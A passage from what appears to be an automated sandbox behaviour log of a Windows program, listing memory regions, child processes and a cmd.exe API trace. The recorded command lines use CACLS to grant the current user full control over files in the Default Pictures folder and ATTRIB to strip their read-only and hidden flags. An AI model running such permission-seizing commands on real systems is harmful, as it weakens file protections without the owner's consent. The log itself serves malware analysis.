entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27269 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27270 start_va = 0xa90000 end_va = 0xa98fff entry_point = 0xa90000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27271 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27272 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27273 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27274 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 27275 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27276 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27277 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27278 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27279 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27280 start_va = 0x300000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 27281 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27282 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27283 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27284 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27285 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27286 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27287 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 571 os_tid = 0x868 Thread: id = 572 os_tid = 0x894 Process: id = "402" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xe00" os_integrity_level = 
"0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "400" os_parent_pid = "0xec8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27288 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27289 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27290 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27291 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27292 start_va = 0x430000 end_va = 0x436fff entry_point = 0x430000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27293 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27294 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27295 
start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27296 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 27297 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27298 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27299 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27300 start_va = 0xb0000 end_va = 0x116fff entry_point = 0xb0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27301 start_va = 0x160000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 27302 start_va = 0x610000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 27303 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27304 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27305 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27306 start_va = 0x76480000 end_va 
= 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27307 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27308 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27309 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27310 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27311 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27312 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27313 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27314 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27315 start_va = 0x260000 end_va = 0x327fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 27316 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27317 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 573 os_tid = 0x95c Process: id = "403" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16ca0" os_pid = "0x84c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27318 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27319 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27320 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000040000" filename = "" Region: id = 27321 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27322 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27323 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27324 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27325 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27326 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 27327 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27328 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27329 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27330 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27331 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = 
"private_0x00000000002c0000" filename = "" Region: id = 27332 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 27333 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27334 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27335 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27336 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27337 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27338 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27339 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27340 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 27341 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27342 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 27343 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27344 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27345 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 27346 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 27347 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 27348 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 27349 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 27350 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 27351 start_va = 0x11c0000 end_va = 0x1322fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011c0000" filename = "" Region: id = 27352 start_va = 0x1330000 end_va = 0x15fefff entry_point = 0x1330000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 574 os_tid = 0x42c [0188.125] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fcb4 | out: lpSystemTimeAsFileTime=0x18fcb4*(dwLowDateTime=0xa5085380, dwHighDateTime=0x1d440a9)) [0188.125] GetCurrentProcessId () returned 0x84c [0188.125] GetCurrentThreadId () returned 0x42c [0188.125] GetTickCount () returned 0x35acc [0188.125] QueryPerformanceCounter (in: lpPerformanceCount=0x18fcac | out: lpPerformanceCount=0x18fcac*=24491635353) returned 1 [0188.128] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0188.128] __set_app_type (_Type=0x1) [0188.128] __p__fmode () returned 0x76b331f4 [0188.128] __p__commode () returned 0x76b331fc [0188.128] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0188.128] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0188.128] GetCurrentThreadId () returned 0x42c [0188.128] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x42c) returned 0x38 [0188.128] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0188.128] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0188.128] SetThreadUILanguage (LangId=0x0) returned 0x409 [0188.128] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0188.128] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18fc44 | out: phkResult=0x18fc44*=0x0) returned 0x2 [0188.129] VirtualQuery (in: lpAddress=0x18fc7b, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x93000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x93000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0188.129] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x18fc14, dwLength=0x1c | out: lpBuffer=0x18fc14*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0188.129] GetConsoleOutputCP () returned 0x1b5 [0188.129] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0188.129] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0188.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0188.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0188.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.130] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0188.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0188.130] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0188.130] GetEnvironmentStringsW () returned 0x2f0308* [0188.130] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.130] GetEnvironmentStringsW () returned 0x2f0308* [0188.130] FreeEnvironmentStringsW (penv=0x2f0308) returned 1 [0188.130] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebb4 | out: phkResult=0x18ebb4*=0x40) returned 0x0 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0xb8, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.130] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x0, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebbc, 
lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegCloseKey (hKey=0x40) returned 0x0 [0188.131] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18ebb4 | out: phkResult=0x18ebb4*=0x40) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x40, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, lpData=0x18ebc0*=0x1, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x0, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x4, lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x4) returned 0x0 [0188.131] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x18ebbc, lpData=0x18ebc0, lpcbData=0x18ebb8*=0x1000 | out: lpType=0x18ebbc*=0x0, 
lpData=0x18ebc0*=0x9, lpcbData=0x18ebb8*=0x1000) returned 0x2 [0188.131] RegCloseKey (hKey=0x40) returned 0x0 [0188.131] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886396 [0188.131] srand (_Seed=0x5b886396) [0188.131] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" [0188.131] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp\"" [0188.131] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0188.132] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2f1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0188.132] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0188.132] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0188.132] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0188.132] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 
